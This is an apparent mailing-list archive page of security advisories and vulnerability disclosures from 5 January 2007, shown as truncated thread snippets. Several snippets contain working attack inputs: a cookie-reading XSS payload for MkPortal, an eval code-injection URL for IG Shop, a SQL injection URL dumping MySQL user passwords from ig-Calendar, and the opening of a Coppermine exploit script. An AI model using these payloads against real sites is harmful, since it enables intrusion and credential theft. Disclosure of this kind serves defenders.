MkPortal Admin XSS

2007-01-05 Thread info
MkPortal Admin XSS Discovered by: Demential Web: http://headburn.altervista.org E-mail: info[at]burnhead[dot]it Mkportal website: http://www.mkportal.it Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new In both fields write: <script>alert(document.cookie)</script> and press save. Alert

IG Shop remote code execution

2007-01-05 Thread asdfj38
If eval is the answer, then you are asking the wrong question. --Unknown ig-shop suffers from two evals that can be controlled by an attacker: http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();// ./cart.php line 692: eval (cart_$action(););

IG Calendar SQL Injection

2007-01-05 Thread asdfj38
SQL Injection in ig-Calendar. This works regardless of magic_quotes_gpc! Dumps mysql login information: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,File_priv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT * FROM users WHERE id='.$id; Should

Uber Uploader 4.2 Arbitrary File Upload Vulnerability

2007-01-05 Thread null_hack
| |Uber Uploader 4.2 Arbitrary File Upload Vulnerability |Gamma Security Team |www.nullak.com |www.gammahack.com |Discovered:Null |Official Site:http://sourceforge.net/projects/uber-uploader |Download

Intranet Open Source Remote Password Disclosure intranet.mdb

2007-01-05 Thread Advisory
# # ARIA-SECURITY TEAM# # Forum: http://aria-security.com # # Discovered by:Aria-Security Team # # #Type:Remote Password Disclosure

Coppermine Photo Gallery = 1.4.10 SQL Injection Exploit

2007-01-05 Thread gmdarkfig
#!/usr/bin/php ?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require(phpsploitclass.php); if($argc 4) { print \n-;

Re: SAP Security Contact

2007-01-05 Thread Fritz . Bauspiess
The contact email address is security sap com. Security issues will then be handled by our Security Response Team in direct communication with the reporter of the issues. Kind regards, Fritz Bauspiess, SAP NetWeaver Product Management Security

[USN-401-1] D-Bus vulnerability

2007-01-05 Thread Kees Cook
=== Ubuntu Security Notice USN-401-1 January 04, 2007 dbus vulnerability CVE-2006-6107 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

[USN-400-1] Thunderbird vulnerabilities

2007-01-05 Thread Kees Cook
=== Ubuntu Security Notice USN-400-1 January 04, 2007 mozilla-thunderbird vulnerabilities CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, CVE-2006-6503, CVE-2006-6505

Advisory 02/2007: WordPress Trackback Charset Decoding SQL Injection Vulnerability

2007-01-05 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: WordPress Trackback Charset Decoding SQL Injection Vulnerability Release Date: 2007/01/05 Last

iDefense Security Advisory 01.05.07: Opera Software Opera Web Browser createSVGTransformFromMatrix Object Typecasting Vulnerability

2007-01-05 Thread iDefense Labs
Opera Software Opera Web Browser createSVGTransformFromMatrix Object Typecasting Vulnerability iDefense Security Advisory 01.05.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 05, 2007 I. BACKGROUND Opera is a cross-platform web browser. More information is available at

[DRUPAL-SA-2007-001] Drupal 4.6.11 / 4.7.5 fixes XSS issue

2007-01-05 Thread Uwe Hermann
Drupal security advisory DRUPAL-SA-2007-001 Project: Drupal core. Date: 2007-Jan-05.

[DRUPAL-SA-2007-002] Drupal 4.6.11 / 4.7.5 fixes DoS issue

2007-01-05 Thread Uwe Hermann
Drupal security advisory DRUPAL-SA-2007-002 Project: Drupal core. Date: 2007-Jan-05.

Flog 1.1.2 Remote Admin Password Disclosure

2007-01-05 Thread corrado . liotta
-=[ADVISORY---]=- FLog 1.1.2 Author: CorryL[EMAIL PROTECTED] -=[---]=- -=[+]

Kolayindir Download (Yenionline) (tr) SqL Injection Vuln.

2007-01-05 Thread ShaFuq31
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr # script name : Kolayindir Download (Yenionline) (tr) # Script Download : http://www.aspindir.com/indir.asp?id=4630 # Risk : High # Found By : ShaFuck31 # Vulnerable file : down.asp # Vulnerable : http://www.victim.com/ScriptPath/down.asp?id=[SqL]

[USN-402-1] Avahi vulnerability

2007-01-05 Thread Kees Cook
=== Ubuntu Security Notice USN-402-1 January 05, 2007 avahi vulnerability CVE-2006-6870 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

Advisory 01/2007: WordPress CSRF Protection XSS Vulnerability

2007-01-05 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: WordPress CSRF Protection XSS Vulnerability Release Date: 2007/01/05 Last Modified: 2007/01/05

Multiple bugs in EditTag

2007-01-05 Thread nj
Script: EditTag Version: 1.2 Author: Greg Billock ([EMAIL PROTECTED]) Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir) I am sorry for my BAD English. Description: 1) Local file injection: An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex.

ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow Vulnerability

2007-01-05 Thread zdi-disclosures
ZDI-07-001: QUALCOMM Eudora WorldMail Remote Management Heap Overflow http://www.zerodayinitiative.com/advisories/ZDI-07-001.html January 5, 2007 -- CVE ID: CVE-2006-6336 -- Affected Vendor: QUALCOMM -- Affected Products: Eudora WorldMail 3.1.x Mail Management Server -- TippingPoint(TM) IPS

iDefense Security Advisory 01.05.07: Opera Software Opera Web Browser JPG Image DHT Marker Heap Corruption Vulnerability

2007-01-05 Thread iDefense Labs
Opera Software Opera Web Browser JPG Image DHT Marker Heap Corruption Vulnerability iDefense Security Advisory 01.05.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 05, 2007 I. BACKGROUND Opera is a cross-platform web browser. More information is available at http://www.opera.com/